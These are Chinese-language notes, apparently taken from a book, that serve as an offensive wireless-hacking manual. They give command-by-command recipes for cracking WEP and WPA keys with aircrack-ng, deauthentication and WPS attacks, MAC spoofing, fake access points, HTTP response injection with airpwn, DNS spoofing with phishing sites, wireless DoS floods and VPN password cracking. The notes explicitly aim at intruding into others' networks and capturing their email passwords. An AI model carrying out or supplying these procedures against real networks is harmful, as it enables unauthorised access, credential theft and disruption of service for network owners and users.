虽然无线破解早就烂大街了,还是去图书馆把这本书补上了,做个笔记,以供以后参考,记得很全面但很乱。测试环境为Kali linux 或backtrack
wep破解
1.将网卡激活成monitor模式
airmon-ng start wlan0 6
2.开始抓取无线数据包:
airodump-ng -w ciw.cap --channel 6 mon0
3.为了加快IV(初始化向量)的获取,可以进行ArpRequest注入式攻击,可以有效提高抓包数量及破解速度:
aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 wlan0
参数解释:
* -3,指的是采取ArpRequest注入攻击方式;
* -b,后面跟上要入侵的AP的MAC地址;
* -h,建议使用,效果会更好,后面跟的是监测到的客户端MAC地址;
* -x num,指的是定义每秒发送数据包数量,这个num值可以根据实际情况调小一些,但一般来说最高1024就可以
4.开启aircrack-ng来进行同步破解:
aircrack-ng -x -f 2 ciw.cap
参数解释:
* -x,是暴力破解模式;
* -f,指启用密码复杂度为2;
1.启动无线网卡的监听模式
$ sudo airmon-ng start wlan0
2. 查看有哪些采用wep加密的路由器,记录目标ap的mac
$ sudo airodump-ng mon0
3. 另开一个终端,运行
$ sudo airodump-ng -c 6 --bssid AP’s MAC -w wep mon0
其中6是AP的信道(channel),AP’sMAC是路由器的MAC地址,wep的是抓下来的数据包保存的文件名
4. 再另开一个终端,与AP建立虚拟连接
$ sudo aireplay-ng -1 0 -a AP’s MAC -h My-MAC mon0
5. 建立虚拟连接成功后,运行下面命令,加速数据获取
$ sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP’s MAC -h My-MAC mon0
6. 收集5000个以上的DATA之后,开始进行解密 。另开一个终端,运行
$ sudo aircrack-ng wep*.cap
如果暂时没算出来的话,继续等,aircrack-ng 会在DATA每增加5000个之后自动再次运行,直到算出密码为止
7. 破解成功后,关闭监控模式
$ sudo airmon-ng stop mon0
自动攻击工具:wep spoonfeeder
Deauth验证攻击,这个对于采用WPA验证的AP攻击都会用到,可以迫使AP重新与客户端进行握手验证,从而使得截获成为可能。命令如下
aireplay-ng -0 10 -a AP's MAC mon0
或者
aireplay-ng -0 10 -a AP's MAC -h Client's MAC mon0
-0指的是采取Deautenticate攻击方式,后面为发送次数,-a后面跟上要入侵的AP的MAC地址,-h建议还是使用,效果会更好,这个后面跟的是监测到的客户端MAC地址
wep破解的多米诺骨牌
1.无客户端chopchop攻击
1.airodump-ng --ivs -c 6 -w file mon0 捕获数据
2.aireplay-ng -l 0 -e AP'ESSID -a AP'MAC -h CLIENT'MAC mon0
FakeAuth:与ap建立虚拟的验证连接,以便之后注入数据包
-h 用于攻击的网卡mac
3.aireplay-ng -4 -b AP'MAC -h CLIENT'MAC mon0
-4 chopchop攻击,生成密钥数据流文件 -h 攻击者自己的mac
生成明文后缀为cap和密钥数据流后缀xor文件
4.tcpdump -s 0 -n -e -r replay_dec.cap
-s 从每个报文截取snaplen字节的数据
-n 不进行ip地址到主机名的转换
-e 在输出行打印数据链路层头部信息
-r 从文件读取包
5.packetforge-ng -0 -a AP'MAC -h CLIENT'MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment xor file -w writetofile
-0 创建一个arp包
-k ip目标ip及端口
-l ip 来源ip及端口
-y file,从文件读取prga数据
-w file 将生成的数据报文写入cap文件
6.aireplay-ng -2 -r writetofile mon0
为加快iv(初始化向量)获取,进行Interactive Attack及交互式攻击,将构造的数据包发送至目标ap
7.aircrack-ng chop*ivs
破解密码
2.无客户端Fragment攻击
1.捕获
2.FakeAuth,虚假验证,监听界面会出现伪造的客户端
3.aireplay-ng -5 -b AP'MAC -h CLIENT'MAC mon0
-5 fragment攻击,生成可用密钥数据流文件
-h 攻击者自己的网卡mac
4.packetforge-ng 构造注入数据包
5.文件生成后,同时进行InteractiveAttack攻击,在airodump下可看到数据飞涨
6.aircrack
3.无客户端ARP+Deauth攻击
1.airodump-ng -w file --channel 6 mon0
2.aireplay-ng -l 0 -e AP'ESSID -a AP'MAC -a FakeMac mon0
fakeauth攻击
3.aireplay-ng -l 6000 -o 1 -q 10 -e AP'ESSID -a AP'MAC -h ATTK'MAC
保证伪造客户端在线
-l delay 延迟数量
-o 每次发送数据包数量
-q sec 发送keep-alives数据包时间间隔
-e 目标ssid
4.aireplay-ng -3 -b AP'MAC -h CLIENT'MAC mon0
-3 同时进行arp注入攻击
5.aircrack-ng -n 152 file
152为wep破解
共享密钥的wep破解
1.监听模式
2.抓包,若客户端没有活动,则deauth攻击,aireplay-ng -0 1 -a AP'MAC mon0
可看到CIPHER栏出现ska标识,右上角出现keystream提示
生成三个文件a.mac.xor, a.cap, a.txt. xor文件为包含预共享密钥的文件
3.fakeauth攻击。
aireplay-ng -1 0 -e AP'ESSID -y a.xor -a AP'MAC -h FAKEMAC mon0
-1 ,fakeauth模式
-h,客户端mac或伪造mac
4.可同时进行ArpRequest注入攻击,进行完fakeauth攻击后,此时aireplay监听界面截获的ARP request数据为0,可再次进行deauth攻击使其重连。
5.aircrack-ng filename
关闭ssid广播的对策
1,抓包分析
2,暴力破解
3,deauth攻击
1.airodump探测,关闭ssid的ap只显示ssid的长度
2.deauth使其重连
3,监听界面出现ssid
突破mac地址过滤
1.获取合法客户端mac地址,airodump、omnipeek、kismet
2.更改mac地址伪造身份。win下用smac,linux下ifconfig wlan0 hw ether MAC 或 athmacchange.sh
3.重新装载网卡,连接ap
数据分析
1.查看ap品牌
2.查看对方访问网站,观察目标习惯,深入攻击
3.截获邮箱等账户密码
破解wpa
一、传统wpa-psk破解
1、2、3.激活网卡,设为monitor模式,捕获数据
4.aireplay-ng -0 1 -a AP'MAC -c CLIENT'MAC wlan0? Deauth攻击获取wpa握手报文
5.aircrack-ng -w dic filename.cap 破解密码
Deauth数据包将以连接至无线路由器的合法无线客户端强制断开,客户端重连,便可以捕获握手包。
-0 之后跟上攻击次数,可根据情况5~10不等;
如果成功,在airodump-ng界面右上角可以看到“wpa handshake"的提示。
-w 后跟字典名。
二、wpa pmk hash破解
内存-时间平衡。 彩虹表。wpa rainbow tables. wpa pmk hash tables.
关于aircrack-ng
主要组件
aircrack-ng 自动检测数据包,恢复密码
airmon-ng 改变无线网卡模式
aiodump-ng 捕获802.11数据
aireplay-ng 创建特殊的数据报文及流量
airserv-ng 将无线网卡连接至某一特定端口
airolib-ng 进行wpa rainbow table攻击时使用,用于建立特定数据库文件
airdecap-ng 解开处于加密状态的数据包
airdriver-ng 显示支持的网卡
airdecloak-ng 过滤出指定的数据
packetforge-ng 为注入攻击制作特殊加密报文,主要用于无客户端破解攻击
wesside-ng 自动wep破解工具,加入fragmentation攻击
tkiptun-ng 针对wpa tkip加密且启用qos的网络
(A) airdecap-ng
airdecap-ng -l -e AP'essid -p AP'password filename.cap
-l 不移除802.11 header部分,防止加密后的文件不可读
对于wep包
airdecap-ng -w AP'password filename.cap
-w 后跟wep十六进制密码
解密后可用wireshark分析
(B)ivstools
合并ivs文件:
ivstools --merge 1.ivs 2.ivs 3.ivs out.ivs
转换cap问ivs
ivstools --convert test.cap test.ivs
(C)airdrive-ng
airdrive-ng supported 查看支持芯片
airdrive-ng detail 序号 详细
airdrive-ng installed 已安装驱动
(D)airdecloak-ng
airdecloak-ng --bssid AP'MAC --filters signal -i 无线报文filename.cap
--filters 过滤选项,跟具体参数
完成后,会保存为后缀名为filtered的pcap文件。
关于wesside-ng
自动破解wep的工具.找出当前连接该无线网络的其他客户端mac,进行身份欺骗,使用类似fragmentation攻击方式,拦截广播及转发数据包,发现prga数据包。注入arp数据报,调用aircrack-ng PTW破解密码。
1.ifconfig wlan0 up
2.airmon-ng start wlan0
3.airodump-ng mon0
4.wesside-ng -v AP'MAC -k 1 -i mon0
-k 重传次数,跟具体数值
捕获数据包保存在wep.cap的文件,可用aircrack-ng对该文件再次破解。
关于tkiptun-ng. 破解wpa
可以解开tkip加密了的数据包,并不是算出密钥。
1.安装
2.激活无线网卡,设为监听模式
3.tkiptun-ng -a AP'MAC -h CLIENT'MAC mon0 或
tkiptun-ng -a AP'MAC -h CLIENT'MAC -m 80 -n 100 mon0
-m 最小包长度
-n 最大包长度
wps破解wpa/wpa2的捷径
1.将网卡设为监听模式
2../wpscan.py -i mon0 扫描开启wps功能的无线设备
3../wpspy.py -i mon0 -e AP'SSID 监测wps状态,是否为已配置
4.打开无线网卡自带配置工具,pin码连接,使用星号查看器查看密码
csrf攻击
现在也可以用reaver跑pin码
关于GPU破解
CUDA
1.获取wpa-psk握手数据包,工具(airodump-ng,omnipeek,commview for wifi,airdefense)
2.打开ewsa,cpu、gpu、dictionary设置
3.import tcpdump file导入握手包,cap、pcap、dmp等
4.开始破解
5.未注册版本只显示两位密码,用winhex查看内存。“工具”--“打开ram内存”--找到ewsa的进程,--“find text“,输入破解的前两位密码,编码模式为”ascii/code“
关于分布式破解
free rainbow tables项目、ZerOne团队分布破解项目
cowpatty破解wpa
1.分析抓获的wpa握手包数据
2.cowpatty -f passd.txt -r wpa.cap -s AP'ESSID -v
-f,后跟字典
-r,抓包文件
table破解
1.genpmk -f wordlist1.txt -d tablename -s AP'ESSID
-f 字典
-d 生成的table文件名
2.cowpatty -d tablename -r a.cap -s AP'ESSID
1.airolib-ng test init
test 要建立的数据库
init 建立数据库的命令
2.airolib-ng test import cowpatty tablename
导入预运算tables
3.airolib-ng database stats
查看数据库状态
4.aircrack-ng -r test capturefile
无线欺骗攻击
伪造ap
1基于硬件的伪造ap。 刷新无线路由firmware,dd-wrt ,openwrt, AirSnarf
2.基于软件的伪造ap
fakeAP
fakeap.pl --interface 网卡名 --channel 频道 --essid AP'SSID --mac AP'MAC
--essid zunzhe008 --interface wlan0
如不必需,可省略mac
airbase-ng
基于上软件的自动化脚本mitmap.sh
./mitmap.sh -m ap -i wlan0 -o eth0 -s AP'SSID
-m 跟四种模式之一
-o 跟有线网卡名,一定要先配置完毕,确保能连接外网
-s 伪造ap的ssid,一般和预伪造目标一致
会将捕获数据保存在当前目录.cap文件
airpwn
下载解压 tar zxvf airpwn
cd airpwn
tar zxvf lorcon-current.tgz
cd lorcon
configure&&make&&make install
cd .. && configure && make
(libpcre库)
缺少文件:cp /usr/local/lib/liborcon-1.0.0.so /usr/lib
破解网络之后进行欺骗
注入配置文件:在airpwn主目录下
conf目录下,编写名为zerone.html的文件
内容:
begin zerone_html
match ^(GET|POST)
ignore ^GET [^ ?]+\.(jpg|jepg|gif|png|tif|tiff)
response content/zerone_html
只要出现GET或POST请求报文,就将其中网址替换成content目录下的zerone_html
content目录下编写zerone_html文件
HTTP/1.1 200 OK
Connection: close
Content-type: text/html
<html><head><title>hack you!!1</title></head>
<body><img src='http://xxxxxxx' width='100%' height='100%'>
</head><body onLoad="alert();">
攻击前注意airpwn支持的网卡
airpwn -c conf/zerone_html -i rausb0 -d rt73 -vvv -F -k WEP
-c 制定配置文件
-d 跟支持的无线网卡驱动名称
-F 假设设置为监听模式的网卡中没有FCS values?
-k wep的16进制密码
连接请求网址验证效果
搜索发现伪造ap:
namp -vv -sS 192.168.1.0/24 -p 80
-sS 采用SYN扫描,在有防火墙时常用
nmap -vv -sV 192.168.1.1 -p 80
-sV 具体版本识别,对端口服务信息探测时使用
收敛法向量法定位ap
MITM:
Monkey-jack
无线跳板攻击
airserv-ng
1.在跳板机1上安装airserv-ng,将网卡设置为提供无线网卡远程访问的服务器
airserv-ng -d 网卡 -p 端口 其他计算机只要连接到这个端口就可以使用此网卡
2.配置端口重定向工具
fpipe -l port -r port IP
-l 监听本地某个端口
-r 转发至某个端口,可以是本机
其他跳板也是如此,一般各跳板端口不同,减少暴露
3,远程攻击
airodump-ng IP:port
常见错误:address already in use,由已开启airserv-ng网络网卡服务并用默认666端口所致,修改端口或停止相应airserv
icmp协议隧道
loki
http协议隧道
GNU HTTPTunnel, HTTP Tunnel
伪造站点+dns欺骗
1.伪造站点
2.dns欺骗
3.查看效果,ping域名,显示内网ip
伪造电子邮件+伪造站点
1.截获邮箱帐号
2.建立伪造站点
3.受害者收到伪造电子邮件,包含域名相似的伪造站点
无线DOS攻击
关联及认证状态:
state1.未通过验证,未建立关联
state2.通过验证,未建立关联
state3.通过验证,建立关联
Access Point Overload , 无线接入点过载攻击
--只要客户端关联表达到饱和程度,接入点就会开始拒绝新的关联请求,这种状态为接入点过载。
Authentication Flood , 身份验证洪水攻击
--大量伪造的身份验证请求超过所能承受的能力时,ap将断开其他无线服务连接。
Authentication Failure , 身份验证失败攻击
--注入无效身份验证请求帧,使ap与客户端的连接中断
Deauthentication Flood , 取消身份验证洪水攻击、验证阻断洪水攻击
--伪造deauthentication帧,注入,踢出合法客户端
Association Flood , 关联洪水攻击、关联淹没攻击
--对于开放身份验证。伪造关联,填充连接状态表。攻击工作在链路层
Disassociation Flood , 取消关联洪水攻击
--取消关联广播多用于配合中间人攻击,而这个常用于目标确定的p2p dos
Duration Attack , 持续时间攻击
--发送占用巨大持续时间值的帧,使其他节点等待
Wireless Adapter Driver Buffer Overflow, 无线网卡驱动溢出攻击
1.网卡漏洞检测工具
WiFi DEnum
2.网络资源,WVE,AusCERT,Milw0rm.com
3.攻击实现工具
metasploit framework
RF Jamming, 射频干扰攻击
--全频道阻塞、瞄准式阻塞
无线vpn破解
1.扫描vpn设备
namp、zenmap
2.截获vpn交互数据包
中间人攻击,ettercap、cain
3.破解
asleap:用于pptp/leap密码恢复
genkeys:将普通字典装换成asleap可识别的dat和idx专用hash文件
genkeys -r dict -f simple.dat -n simple.idx
-r 事先准备的字典
-f 预制作的dat格式hash文件
-n 预制作的idx格式hash文件
asleap -r shark -f simple.dat -n simple.idx
-r 截获的vpn客户端登录数据包
1.IPSecScan扫描启用ipsec的设备
ipsecscan ip
2.确认vpn设备
ike-scan --sport=0 -M ip
--sport=<port> 设置udp源端口,默认500,随机端口为0.
-M 将结果逐行显示
--showbackoff vpn指纹识别
ike-scan --sport=0 --showbackoff -M ip 探测vpn操作系统或设备版本
3.基于截获数据cain破解